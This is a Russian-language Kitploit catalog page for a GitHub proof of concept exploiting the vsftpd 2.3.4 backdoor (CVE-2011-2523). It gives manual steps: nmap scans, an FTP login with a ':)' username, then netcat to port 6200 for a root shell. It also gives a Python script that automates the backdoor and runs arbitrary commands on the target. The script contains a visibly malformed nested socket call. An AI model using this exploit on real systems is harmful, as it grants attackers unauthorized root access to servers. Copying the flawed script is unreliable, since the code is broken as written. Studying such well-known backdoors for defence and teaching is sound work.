Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
vsftpd-2.3.4---Backdoor-Command-Execution — vsftpd 2.3.4 (CVE-2011-2523) — это критическая уязвимость, приводящая к Reverse Root Shell. В этом репозитории я пошагово покажу PoC того, как эксплуатировать её вручную и автоматически (на Python) в образовательных целях. | Kitploit
Инструменты/GitHubGitHub/tshaq17/vsftpd-2.3.4---backdoor-command-execution
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubtshaq17/vsftpd-2.3.4---backdoor-command-execution

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) — это критическая уязвимость, приводящая к Reverse Root Shell. В этом репозитории я пошагово покажу PoC того, как эксплуатировать её вручную и автоматически (на Python) в образовательных целях.

Репозиторий
7 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) — критическая уязвимость, приводящая к получению Root Shell. В этом репозитории я продемонстрирую PoC эксплуатации этой уязвимости шаг за шагом: вручную и автоматически (Python) в образовательных целях.

В чем заключается уязвимость? Во-первых, это эксплойт на стороне сервера, поэтому мы будем эксплуатировать его удалённо. Идея в том, что при подключении к FTP-серверу по умолчанию на порту 21 с использованием имени пользователя, содержащего :), система открывает TCP-порт 6200 с Root Shell. Таким образом, любой может подключиться к нему и получить root-доступ к целевому серверу, что является катастрофой. Давайте сделаем это практически шаг за шагом. Сначала я объясню вручную, чтобы получить полное представление, а затем будет Python-скрипт для автоматической эксплуатации.

Вручную

Сканирование портов

  1. Порт 21 открыт
root@kitploit:~
nmap -p21 -sV -sC -O Target_IP 
изображение
  1. Порт 6200 закрыт
root@kitploit:~
nmap -p6200 Target_IP
  • Порт 6200 пока закрыт
изображение

Эксплуатация

  1. Подключаемся к FTP-серверу и используем вредоносное имя пользователя, чтобы заставить систему открыть порт 6200
root@kitploit:~
ftp Target_IP 
  • Имя пользователя: anything:)
  • Пароль: anything изображение
  1. Проверяем порт 6200 после подключения по FTP
root@kitploit:~
nmap -p6200 Target_IP

Порт 6200 теперь открыт — это наш бэкдор

изображение
  1. Подключаемся к порту 6200, чтобы получить Root Shell на всём сервере
root@kitploit:~
nc -nv Target_IP 6200

Наконец, мы получили Root Shell на целевой машине. изображение


Автоматически

После ручного выполнения мы знаем шаги эксплойта:

  1. Подключиться к FTP-серверу на порту 21.
  2. Использовать имя пользователя, содержащее :), чтобы активировать бэкдор.
  3. Подключиться к порту 6200.
root@kitploit:~
#!/usr/bin/python3 

from ftplib import FTP
import socket
import sys
import time

Target_IP = sys.argv[1]
cmd = sys.argv[2]

# Step1: Connect to FTP
try:
  ftp = FTP(Target_IP,timeout=2)
  ftp.login("user:)","password") # Step2: Send the malicious username
except:
  pass

time.sleep(1) # To give a time for the server to open the port (6200)

#Step3: Connect to port (6200) to have a Root Shell
shell = socket.socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
try:
  shell.connect((Target_IP,6200))
except:
  print("Shell Failed")

#Execute the commands
shell.send(cmd.encode() + b"\n")
print(shell.recv(4096).decode())

#Finally close the connection
shell.close()
Скачать инструмент